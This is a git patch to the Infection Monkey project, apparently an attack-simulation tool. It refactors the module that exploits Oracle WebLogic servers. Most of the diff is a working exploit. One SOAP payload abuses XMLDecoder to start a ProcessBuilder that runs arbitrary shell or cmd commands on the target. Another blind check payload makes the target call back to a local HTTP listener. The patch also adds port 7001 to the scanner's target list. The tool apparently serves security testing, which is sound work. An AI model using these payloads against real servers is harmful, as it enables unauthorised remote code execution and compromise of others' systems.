From 307a7c396c70f72cd2a35a2bdfdb8f2deaa8d11a Mon Sep 17 00:00:00 2001
From: Vakaris <vaoxygen@gmail.com>
Date: Sat, 25 Aug 2018 17:56:43 +0300
Subject: [PATCH] Notes fixed and tested

---
 infection_monkey/config.py           |   3 +-
 infection_monkey/exploit/weblogic.py | 141 ++++++++++++++-------------
 2 files changed, 77 insertions(+), 67 deletions(-)

diff --git a/infection_monkey/config.py b/infection_monkey/config.py
index b5df92f55..f8094817c 100644
--- a/infection_monkey/config.py
+++ b/infection_monkey/config.py
@@ -191,7 +191,8 @@ class Configuration(object):
 
     # TCP Scanner
     HTTP_PORTS = [80, 8080, 443,
-                  8008, 7001  # HTTP alternate
+                  8008, # HTTP alternate
+                  7001  # Oracle Weblogic default server port
                   ]
     tcp_target_ports = [22,
                         2222,
diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py
index bd6cbc777..4169bb537 100644
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@@ -17,11 +17,11 @@ import logging
 __author__ = "VakarisZ"
 
 LOG = logging.getLogger(__name__)
-# How long server waits for get request
+# How long server waits for get request in seconds
 SERVER_TIMEOUT = 4
-# How long to wait for a request to go to vuln machine and then to our server from there
+# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
 REQUEST_TIMEOUT = 2
-# How long to wait for response in exploitation
+# How long to wait for response in exploitation. In seconds
 EXECUTION_TIMEOUT = 15
 URLS = ["/wls-wsat/CoordinatorPortType",
         "/wls-wsat/CoordinatorPortType11",
@@ -55,40 +55,10 @@ class WebLogicExploiter(WebRCE):
         return exploit_config
 
     def exploit(self, url, command):
-        empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
-          <soapenv:Header>
-            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
-              <java>
-                <object class="java.lang.ProcessBuilder">
-                  <array class="java.lang.String" length="3" >
-                    <void index="0">
-                      <string>{cmd_base}</string>
-                    </void>
-                    <void index="1">
-                      <string>{cmd_opt}</string>
-                    </void>
-                    <void index="2">
-                      <string>{cmd_payload}</string>
-                    </void>
-                  </array>
-                  <void method="start"/>
-                </object>
-              </java>
-            </work:WorkContext>
-          </soapenv:Header>
-          <soapenv:Body/>
-        </soapenv:Envelope>
-        '''
         if 'linux' in self.host.os['type']:
-            cmd_base = '/bin/sh'
-            cmd_opt = '-c'
-            command += ' 1> /dev/null 2> /dev/null'
+            payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
         else:
-            cmd_base = 'cmd'
-            cmd_opt = '/c'
-            command += ' 1> NUL 2> NUL'
-
-        payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+            payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
         try:
             post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
         except Exception as e:
@@ -96,7 +66,7 @@ class WebLogicExploiter(WebRCE):
             print(e)
         return True
 
-    class HTTPServer(threading.Thread):
+    class IndicationHTTPServer(threading.Thread):
         """
         Http server built to wait for GET requests. Because oracle web logic vuln is blind,
         we determine if we can exploit by either getting a GET request from host or not.
@@ -109,6 +79,7 @@ class WebLogicExploiter(WebRCE):
             self._stopped = False
             self.lock = lock
             threading.Thread.__init__(self)
+            self.daemon = True
 
         def run(self):
             class S(BaseHTTPRequestHandler):
@@ -132,43 +103,81 @@ class WebLogicExploiter(WebRCE):
 
     def check_if_exploitable(self, url):
         # Server might get response faster than it starts listening to it, we need a lock
-        lock = threading.Lock()
-        local_port = get_free_tcp_port()
-        local_ip = get_interface_to_target(self.host.ip_addr)
-        httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
-        httpd.daemon = True
-        lock.acquire()
-        httpd.start()
-        lock.acquire()
-        generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
-          <soapenv:Header>
-            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
-              <java version="1.8" class="java.beans.XMLDecoder">
-                <void id="url" class="java.net.URL">
-                  <string>http://{lhost}:{lport}</string>
-                </void>
-                <void idref="url">
-                  <void id="stream" method = "openStream" />
-                </void>
-              </java>
-            </work:WorkContext>
-          </soapenv:Header>
-         <soapenv:Body/>
-        </soapenv:Envelope>
-        '''
-        payload = generic_check_payload.format(lhost=local_ip, lport=local_port)
+        httpd, lock = self._start_http_server()
+        payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
         try:
             post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
         except exceptions.ReadTimeout:
+            # Our request does not get response thus we get ReadTimeout error
             pass
         except Exception as e:
             LOG.error("Something went wrong: %s" % e)
+        self._stop_http_server(httpd, lock)
+        return httpd.get_requests > 0
 
+    def _start_http_server(self):
+        lock = threading.Lock()
+        local_port = get_free_tcp_port()
+        local_ip = get_interface_to_target(self.host.ip_addr)
+        httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
+        lock.acquire()
+        httpd.start()
+        lock.acquire()
+        return httpd, lock
+
+    def _stop_http_server(self, httpd, lock):
         lock.release()
         httpd.join(SERVER_TIMEOUT)
         httpd.stop()
-        if httpd.get_requests > 0:
-            exploited = True
-        else:
-            exploited = False
-        return exploited
+        return True
+
+
+    @staticmethod
+    def exploit_payload(cmd_base, cmd_opt, command):
+        empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+                  <soapenv:Header>
+                    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+                      <java>
+                        <object class="java.lang.ProcessBuilder">
+                          <array class="java.lang.String" length="3" >
+                            <void index="0">
+                              <string>{cmd_base}</string>
+                            </void>
+                            <void index="1">
+                              <string>{cmd_opt}</string>
+                            </void>
+                            <void index="2">
+                              <string>{cmd_payload}</string>
+                            </void>
+                          </array>
+                          <void method="start"/>
+                        </object>
+                      </java>
+                    </work:WorkContext>
+                  </soapenv:Header>
+                  <soapenv:Body/>
+                </soapenv:Envelope>
+                '''
+        payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+        return payload
+
+    @staticmethod
+    def test_payload(ip, port):
+        generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+                  <soapenv:Header>
+                    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+                      <java version="1.8" class="java.beans.XMLDecoder">
+                        <void id="url" class="java.net.URL">
+                          <string>http://{host}:{port}</string>
+                        </void>
+                        <void idref="url">
+                          <void id="stream" method = "openStream" />
+                        </void>
+                      </java>
+                    </work:WorkContext>
+                  </soapenv:Header>
+                 <soapenv:Body/>
+                </soapenv:Envelope>
+                '''
+        payload = generic_check_payload.format(host=ip, port=port)
+        return payload